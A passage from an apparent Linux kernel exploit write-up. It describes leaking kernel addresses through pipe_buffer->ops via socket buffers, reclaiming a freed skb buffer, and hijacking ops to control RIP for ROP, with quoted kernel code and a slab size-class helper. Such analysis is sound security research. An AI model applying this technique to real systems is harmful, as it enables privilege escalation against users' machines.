        static ssize_t pipe_write(struct kiocb *iocb, struct iov_iter *from)
        {
            // [...]
            struct pipe_buffer *buf;
            // [...]
            buf = &pipe->bufs[head & mask];
            buf->page = page;
            buf->ops = &anon_pipe_buf_ops;
            buf->offset = 0;
            buf->len = 0;
            // [...]
        }

- Read skb data to leak ktext from pipe_buffer->ops
  - The ops member of pipe_buffer points to the variable &anon_pipe_buf_ops, which can be leaked by receiving the socket data.
  - Once the data is received, the skb objects and their buffers are freed.
- Reclaim the freed skb data buffer and do ROP
  - By sending packets of size 0x200, the skb data buffer reclaims the previously freed data buffer.
  - By hijacking the ->ops member, we can control the RIP when the pipe fd is closed [1].

        static inline void pipe_buf_release(struct pipe_inode_info *pipe,
                                            struct pipe_buffer *buf)
        {
            const struct pipe_buf_operations *ops = buf->ops;

            buf->ops = NULL;
            ops->release(pipe, buf); // [1]
        }
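
The slab-cache claims made throughout section 4 can be sanity-checked with a small size-class helper. This is a sketch under assumptions: it uses the general-purpose kmalloc size classes of a typical x86-64 SLUB kernel without debugging options, takes sizeof(struct bitmap_ip) as 0x58 as stated in the notes, and ignores the distinction between the plain and -cg caches. The helper names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

/* Assumed kmalloc size classes on a typical x86-64 SLUB configuration. */
static const size_t kmalloc_classes[] = {
	8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192,
};

/* Smallest size class that fits `size`, or 0 if it exceeds the table. */
static size_t kmalloc_class(size_t size)
{
	size_t n = sizeof(kmalloc_classes) / sizeof(kmalloc_classes[0]);

	assert(size > 0);
	for (size_t i = 0; i < n; i++)
		if (size <= kmalloc_classes[i])
			return kmalloc_classes[i];
	return 0;
}

/* Size of the bitmap_ip map object: header (taken as 0x58) plus extensions. */
static size_t bitmap_ip_map_size(size_t elements, size_t dsize)
{
	return 0x58 + elements * dsize;
}

/* Usage: the allocations discussed in sections 4.3, 4.5 and 4.6. */
static void slab_example(void)
{
	assert(kmalloc_class(bitmap_ip_map_size(53, 0x8)) == 512);   /* comment set */
	assert(kmalloc_class(16 + 0x90 + 1) == 192);                 /* comment buffer */
	assert(kmalloc_class(bitmap_ip_map_size(64, 0x10)) == 2048); /* counter set */
	assert(kmalloc_class(16 * 40) == 1024);                      /* pipe_buffer array */
}
```

The comment-set map comes out at exactly 512 bytes, so the first out-of-bounds extension slot (ID 0x35, offset 0x58 + 0x8 * 0x35 = 0x200) is the first 8 bytes of the next object in the same slab.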